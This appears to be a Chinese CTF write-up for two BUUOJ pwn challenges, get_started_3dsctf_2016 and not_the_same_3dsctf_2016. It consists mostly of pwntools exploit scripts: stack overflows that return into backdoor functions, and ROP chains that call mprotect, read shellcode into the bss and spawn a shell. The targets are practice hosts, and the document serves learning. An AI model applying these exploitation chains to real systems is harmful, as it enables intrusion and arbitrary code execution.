1、get_started_3dsctf_2016
比较常规的解法:
由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。
参考:
buuoj get_started_3dsctf_2016 WriteUp - CSULuyao - 博客园
from pwn import *
import sys
def dbg(p):
gdb.attach(p)
pause()
if sys.argv[1] == 'l':
p = process("./get_started_3dsctf_2016")
dbg(p)
else:
p = remote("node4.buuoj.cn",29821)
elf = ELF("./get_started_3dsctf_2016")
backdoor_addr = 0x80489A0
offset = 0x38
a1 = 814536271
a2 = 425138641
payload = "a" * offset + p32(backdoor_addr) + p32(elf.sym["exit"]) + p32(a1) + p32(a2)
p.sendline(payload)
p.interactive()不常规的解法:
from pwn import *
import sys
context(log_level = "debug")
# https://blog.csdn.net/mcmuyanga/article/details/108274091
# 肯定有人疑问了为什么是0x80EB000而不是bss段的开头0x80EBF80,
# 因为指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,
# 并且区间长度 len 必须是页大小的整数倍。
def dbg(p):
gdb.attach(p)
pause()
if sys.argv[1] == 'l':
p = process("./get_started_3dsctf_2016")
dbg(p)
else:
p = remote("node4.buuoj.cn",29821)
elf = ELF("./get_started_3dsctf_2016")
mprotect_addr = elf.sym["mprotect"]
offset = 0x38
pop_3_ret = 0x080509a5 #pop up three used parameters
shellcode_addr = elf.bss()-(elf.bss() & 0xfff)
read = elf.sym["read"]
payload = "a" * offset + p32(mprotect_addr) + p32(pop_3_ret) + p32(shellcode_addr) + \
p32(0x100) + p32(0x7) + p32(read) + p32(pop_3_ret) + p32(0) + \
p32(shellcode_addr) + p32(0x100) + p32(shellcode_addr)
shellcode = asm(shellcraft.sh())
p.sendline(payload)
p.sendline(shellcode)
p.interactive()2、not_the_same_3dsctf_2016
同样的一道题,常规解法
from pwn import *
import sys
def dbg(p):
gdb.attach(p)
pause()
if sys.argv[1] == 'l':
p = process("./not_the_same_3dsctf_2016")
dbg(p)
else:
p = remote("node4.buuoj.cn",25817)
elf = ELF("./not_the_same_3dsctf_2016")
offset = 45
get_secret = 0x080489A0
printf_addr = 0x0804F0A0
flag_addr = 0x080ECA2D
payload = "a" * offset + p32(get_secret) + p32(printf_addr) + p32(elf.sym["exit"]) + p32(flag_addr)
p.sendline(payload)
p.interactive()不常规解法
from pwn import *
import sys
context(log_level = "debug")
def dbg(p):
gdb.attach(p)
pause()
if sys.argv[1] == 'l':
p = process("./not_the_same_3dsctf_2016")
dbg(p)
else:
p = remote("node4.buuoj.cn",29821)
elf = ELF("./not_the_same_3dsctf_2016")
mprotect_addr = elf.sym["mprotect"]
offset = 45
pop_3_ret = 0x080494db #pop up three used parameters
shellcode_addr = elf.bss()-(elf.bss() & 0xfff)
read = elf.sym["read"]
payload = "a" * offset + p32(mprotect_addr) + p32(pop_3_ret) + p32(shellcode_addr) + \
p32(0x100) + p32(0x7) + p32(read) + p32(pop_3_ret) + p32(0) + \
p32(shellcode_addr) + p32(0x100) + p32(shellcode_addr)
shellcode = asm(shellcraft.sh())
p.sendline(payload)
p.sendline(shellcode)
p.interactive()3、极客大挑战的pwn222
没找到文件,写这道题的目的是因为跟前面那个checkin的解法差不多,所以想拿来巩固一下,给几个wp链接
